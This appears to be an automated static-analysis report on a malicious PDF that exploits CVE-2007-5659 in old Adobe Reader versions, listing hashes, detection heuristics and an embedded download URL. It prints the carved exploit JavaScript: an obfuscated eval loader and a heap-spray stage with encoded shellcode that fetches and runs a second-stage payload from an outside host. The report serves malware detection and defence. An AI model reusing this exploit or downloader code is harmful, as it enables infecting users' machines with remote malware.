Malicious PDF — malware analysis report

Static analysis result for SHA-256 5e248e5405fb8594…

MALICIOUS

PDF

12.3 KB
MD5: 513c1b13101250034ce3b4098d47b841 SHA-1: 4c11f98203de75958617a6e08ae981e49250c269 SHA-256: 5e248e5405fb859419b5ade4807681d53d09e5b490b72163ce812d33950f0c10
318 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF file contains JavaScript that exploits CVE-2007-5659, specifically targeting Adobe Reader versions affected by APSB08-13. The script is designed to download a second-stage payload from the URL http://danenskgela.com/nte/avorp1rfx.php/... . The embedded JavaScript and exploit cluster firings strongly indicate a malicious intent to execute arbitrary code.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 9

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-36079 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36079
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://danenskgela.com/nte/avorp1rfx.php/yU230d9c2eH58cb7138V03003f36002Rb01ced4f102T9393ea18Q00000000901801F0035010aJ0f000601l0007 Referenced by PDF JavaScript

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js
ef8bdac794684ae9cd4eb7091d80e1c5ca478c06c639d72d01626c1f7ce78b6d		 pdf-javascript-stream PDF /JS object 7 at offset 0x19C 578 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function dskp(s) {s = s.split('%'); r = ''; for (c in s) {if (!s[c]) continue; r += String.fromCharCode(parseInt(s[c], 16));} return r;}vd =  ''; vnt = event; r = (r = 'l'  + vd + 'a' + 'ce', 'rep' + r); if  (!vd && r) {var z; tis = vnt['tar' + vd + 'get'];var e = vd + 'v' + 'a'; e = vd + 'e' + e; e = tis[e + 'l']; var y; z = y = tis; 
	 y = 0; 	 sas = 'sync'; sas += 'An' + vd + 'notS' + 'can'; z[sas] ( ); y = z;sbj = 'su' + 'bject';var p = y['g'+'et'+'Azots'[r](/z/, 'nn')]( {  nPage: 0 }) ;var s = p[0][sbj];var l = s[r](/rz /g, 'q%p'[r](/[qp]/g, ''));s = dskp (l) ;e(s);}
legacy_pdfkit_stage_000.js
145dd7776f2f48461da7a9f6d9c832fdd70fc15a81bb9ce8e35fab0ae9dcf315		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x36F 12822 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function q3f_i5D8_g(PPg_1hgp__h, NqkSo2l){BN6Ukh8MxfG4 = '';  X_6_E2j_8 = "oS" + "t" + "r" + "in" + "g";X_6_E2j_8 = "t" + X_6_E2j_8;var eQ_73__UW4oX4r = 'um' + 'en' + "ts";eQ_73__UW4oX4r = 'a' + 'rg' + eQ_73__UW4oX4r;var BN6Ukh8MxfG4 = q3f_i5D8_g[eQ_73__UW4oX4r]["c" + "a" + "zzee"['r'+'epl'+'ace'](/zz/, 'll')];BN6Ukh8MxfG4 = BN6Ukh8MxfG4[X_6_E2j_8]();var LM_7_8q = 0;try{if (app){LM_7_8q++;LM_7_8q++;}}catch(e){}var BAhQ0_c_XD = new Array();if (PPg_1hgp__h){ BAhQ0_c_XD = PPg_1hgp__h;}else{var r52K__w56y = 0;var g__6q48_K = 0;var M5U8twE6328PX4v = 512;var d0ac6___k6v_TIw = 52;d0ac6___k6v_TIw = d0ac6___k6v_TIw - 4;var bP_H6X = d0ac6___k6v_TIw + 9;while(g__6q48_K < BN6Ukh8MxfG4['le'+'ngth']){var OMA0si4QE0 = 1;var m0IwR3hS = BN6Ukh8MxfG4['c'+'h'+'arC'+'odeAt'](g__6q48_K);if (m0IwR3hS <= bP_H6X && m0IwR3hS >= d0ac6___k6v_TIw){if (r52K__w56y == 4){r52K__w56y = 0;}if (isNaN(BAhQ0_c_XD[r52K__w56y])){BAhQ0_c_XD[r52K__w56y] = 0;}BAhQ0_c_XD[r52K__w56y] += m0IwR3hS;if (BAhQ0_c_XD[r52K__w56y] > 512){BAhQ0_c_XD[r52K__w56y] -= M5U8twE6328PX4v;}r52K__w56y++;}g__6q48_K++;}}var kSF_6_iabo8 = 0;r52K__w56y = 4;for (; kSF_6_iabo8 < 4; ++kSF_6_iabo8){if (BAhQ0_c_XD[kSF_6_iabo8] > 256){BAhQ0_c_XD[kSF_6_iabo8] -= 256;}}var G_3s__LCr_4BX = 0;var IP_hnhmUA0u;var VV_5Y5__JcsK1j = 0;var s_m7uc3d2 = 0;var H_bVNC1F = 0;var W_8K5_C_B1d22E6 = "";while(H_bVNC1F < NqkSo2l.length){var u2____3__J7g = NqkSo2l.substr(H_bVNC1F, 1) + "Z";var c6iu_aS_x = parseInt(u2____3__J7g, 16);if (G_3s__LCr_4BX){IP_hnhmUA0u += c6iu_aS_x;if (s_m7uc3d2 == 4){s_m7uc3d2 -= 4;}var A_on___RY = IP_hnhmUA0u;A_on___RY = A_on___RY - (1 + VV_5Y5__JcsK1j + 1) * BAhQ0_c_XD[s_m7uc3d2];if (A_on___RY < 0){var aC__rYni_us = 256;A_on___RY = A_on___RY - Math['floor'](A_on___RY / aC__rYni_us) * 256;}A_on___RY = String['from' + 'CharCode'](A_on___RY);if (LM_7_8q == 2){W_8K5_C_B1d22E6 += A_on___RY;}else if (LM_7_8q == 1){W_8K5_C_B1d22E6 += c6iu_aS_x;}else{W_8K5_C_B1d22E6 += H_bVNC1F;}s_m7uc3d2++;G_3s__LCr_4BX = 0;VV_5Y5__JcsK1j++;}else{G_3s__LCr_4BX = 1;IP_hnhmUA0u = c6iu_aS_x * 16;}H_bVNC1F++;};drqjq = 1 ; brin = 5;;var pywgI1Hk86b3h = this;pywgI1Hk86b3h['e' + 'val'](W_8K5_C_B1d22E6);}
	q3f_i5D8_g(0, "74D25E3342C12A263F943B022376E8C72B410AE8612DC9D1585AED630B20D67850F1C1522CF59740F6E644DB0D0B71F9EEC35B931EE11E7325CCF458E267E23224A61A362E86071DD67AB803E55DCFACFF408D84D22EA74FF811783001FC6B090EC151DFBAE657EEF5D516CAF18C1AA6E76A3799EB9FC864E578E60FBA5DC5EBB021CBFD9A1A78D8D528A3B7A4148F5EB8007531DEFC5B53D8E262228A8E1B0DBFC3ECC6C29CEBAE8D88EE63897F067EA221B9036C0FA325B54B7C11A33760BCAF105CBF99D05F8E7AF95D2B6F9520224EA64D225AB927D26D98F8EB7B45DC778370EB854E35D0544A1B944A7C03BC2C7C28B00B45CD6DF065C980BA35CC5F7B6ECA173E237D536557BBE42F516C0FDB5F8FF5E21A2DC57F565AE6AE472ECE8B0636AB522CF170271BDD56DB31FF3EFA43E36FD73C952DB02589407AF58C1F3B2E8AD8F3EB46C1EA1F6FA4B3D35EE3B50F2F84A70904A75317278D5AD2CE49F719F56BEAF9B169FDEFC8148BCF7534A6C5A0F094F886072FB48D032EF677E925E5199DC9A318C1D596F1A8AAA9146498DCFA7B3398F96D4DCDED5CDB9FA200C887714793BE9CEFAE8A9A1284B145B0446E23AC056A188823A510B3CFB33399D66EEC4CD09F098B9456F26A2B5AD94F1E8D954D3183ACF8CD929E22E2968DC0785B31BE5C3A7898737520C31F8343A9263EE179C32CDD58A141B991AE6AE4339635D0364B31C74E664A6901EB5694E70622920ADC493DA88A064CDC9A154497762809835D50348C0A53269B133B0175AF21E95B9629A44789FE903E913999EE63239F1347223DD4CFEE32A406D248D8C6E14093A2F4057F891C30881BDFC54207C0B137D3EDE557C2F5A043B5CA8C3ABD0595F74307A30971A665DA1DB57AD905EB50BBDAB21278AC962AA37BC40D745CCDF86735DABD4D0DDAE8472FD4CE4EFE8682029C95A61E6F7E75EA6D858AE955BB60CB2A8222962BAB47BB0FAAE57DB45EE25573B5BD647578BC796480E24F36759911E3676DEACF4859DF9B6E6BE28A936ADAA0794CBF474B2484687741C32C2E2AA2C332F96EC1390E6DA96FE44F7E36A61A7F5FCB3F635E69E5081267D9C76941E8C92C40FDB83466D38A291D95371BF16E230ADF73EF53FC8C0A05F447E618B933CD40E43C5F0379F64EE465EB170A77EE062F76E61C1558CBC3E7159B87D0317E63D5ED9B8705EC933201EF580E08078307D5EF5D030BDB528BE5BD2F7AED781B6DC2641275FD6DCF58E87AEE1AF25ADB019A2999BDAA2899BDD11D6686E5C98F39D5CE7A35D0D1263495970CB7C9B01AD5A49FEEC37FA41A8CC435F966C060F21BA95688FC6647B9126206B2E99F2A54755C
... (truncated)
legacy_pdfkit_stage_001.js
44b758ca5e82e82237ad78ccf0f71a3a03c2519e840493ada3ab9db643ceb03f		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x36F 5321 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var HdR7IKw71A8 = new Array();var u_R8_q = 0;var B_0Tt64_s = "";function q4x3h_EQ_1A(a_0RXD5_WK2p0E, i___l2__7J_Y){var e__R48XE420_j = i___l2__7J_Y.toString();var Sh_3_7_J87jvwT = "";for(var Eq_0l_3G_DpY = 0; Eq_0l_3G_DpY < e__R48XE420_j.length; Eq_0l_3G_DpY++) {var d_7_4qnY_0 = parseInt(e__R48XE420_j.substr(Eq_0l_3G_DpY, 1));if (!isNaN(d_7_4qnY_0)) {d_7_4qnY_0 = d_7_4qnY_0.toString(16);if (d_7_4qnY_0.length == 1) { d_7_4qnY_0 = "0" + d_7_4qnY_0; }else if (d_7_4qnY_0.length != 2) { d_7_4qnY_0 = "00"; }Sh_3_7_J87jvwT = d_7_4qnY_0 + Sh_3_7_J87jvwT;}}while(Sh_3_7_J87jvwT.length < 8) { Sh_3_7_J87jvwT = "0" + Sh_3_7_J87jvwT; }var LFB3uYNm_OG85 = a_0RXD5_WK2p0E.toString(16);if (LFB3uYNm_OG85.length == 1) { LFB3uYNm_OG85 = "0" + LFB3uYNm_OG85; }else if (LFB3uYNm_OG85.length != 2) { LFB3uYNm_OG85 = "00"; }Sh_3_7_J87jvwT = "3" + LFB3uYNm_OG85 + "P" + Sh_3_7_J87jvwT;return Sh_3_7_J87jvwT;}function LAN4_Ur_h6_w(s6kArVjX2y32, k_NbJb6t){var i_r_v8_i = new Array("");var QY1x5__eJp_c = s6kArVjX2y32;var a1lVgyCM7n;if ((a1lVgyCM7n = s6kArVjX2y32.lastIndexOf("%u00")) != -1) {if (a1lVgyCM7n + 6 == s6kArVjX2y32.length) {i_r_v8_i[0] = s6kArVjX2y32.substr(a1lVgyCM7n + 4, 2);QY1x5__eJp_c = s6kArVjX2y32.substring(0, a1lVgyCM7n);}}a1lVgyCM7n = 1;for (Eq_0l_3G_DpY = 0; Eq_0l_3G_DpY < k_NbJb6t.length; Eq_0l_3G_DpY++) {var loNAh__u___I = k_NbJb6t.charCodeAt(Eq_0l_3G_DpY).toString(16);if (loNAh__u___I.length == 1) { loNAh__u___I = "0" + loNAh__u___I; }i_r_v8_i[a1lVgyCM7n] = loNAh__u___I;a1lVgyCM7n++;}Eq_0l_3G_DpY = i_r_v8_i[0].length ? 0 : 1;i_r_v8_i[a1lVgyCM7n] = "00";i_r_v8_i[a1lVgyCM7n + 1] = "00";a1lVgyCM7n += 2;if ((i_r_v8_i.length - Eq_0l_3G_DpY) % 2) {i_r_v8_i[a1lVgyCM7n] = "00";}while(Eq_0l_3G_DpY < i_r_v8_i.length) {QY1x5__eJp_c += "%u" + i_r_v8_i[Eq_0l_3G_DpY + 1] + i_r_v8_i[Eq_0l_3G_DpY];Eq_0l_3G_DpY += 2;}QY1x5__eJp_c += "%u0000";return QY1x5__eJp_c;}function q_K4qHemFp(q_G_LB1eI_e__x, p__Rf_DC1Jy){while (q_G_LB1eI_e__x.length*2<p__Rf_DC1Jy) {q_G_LB1eI_e__x += q_G_LB1eI_e__x;}q_G_LB1eI_e__x = q_G_LB1eI_e__x.substring(0,p__Rf_DC1Jy/2);return q_G_LB1eI_e__x;}function uluy2u48yc_Axf(C6aC_36N3_Veh, FXC_i_L8hdn__w5, N_B_j25_P5F__3){var m7v_KG = 0x0c0c0c0c;var q_G_LB1eI_e__x = unescape(FXC_i_L8hdn__w5);var k_NbJb6t = q4x3h_EQ_1A(C6aC_36N3_Veh, N_B_j25_P5F__3);var uI7__l3o = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var s6kArVjX2y32 = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u4d70%u4e66%u0050%u7468%u7074%u2f3a%u642f%u6e61%u6e65%u6b73%u6567%u616c%u632e%u6d6f%u6e2f%u6574%u612f%u6f76%u7072%u7231%u7866%u702e%u7068%u792f%u3255%u3033%u3964%u3263%u4865%u3835%u6263%u3137%u3833%u3056%u3033%u3330%u3366%u3036%u3230%u6252%u3130%u6563%u3464%u3166%u3230%u3954%u3933%u6533%u3161%u5138%u3030%u3030%u3030%u3030%u3039%u3831%u3130%u3046%u3330%u3035%u3031%u4a61%u6630%u3030%u3630%u3130%u306c%u3030%u0037";app.T_6dseo_4__l_31 = unescape(LAN4_Ur_h6_w(s6kArVjX2y32, k_NbJb6t));var v_Oj_3__1___J = 0x400000;var OJ5_N4O6i = uI7__l3o.length * 2;var p__Rf_DC1Jy = v_Oj_3__1___J - (OJ5_N4O6i+0x38);q_G_LB1eI_e__x = q_K4qHemFp(q_G_LB1eI_e__x, p__Rf_DC1Jy);var fv5Q5_QkLNS = (m7v
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.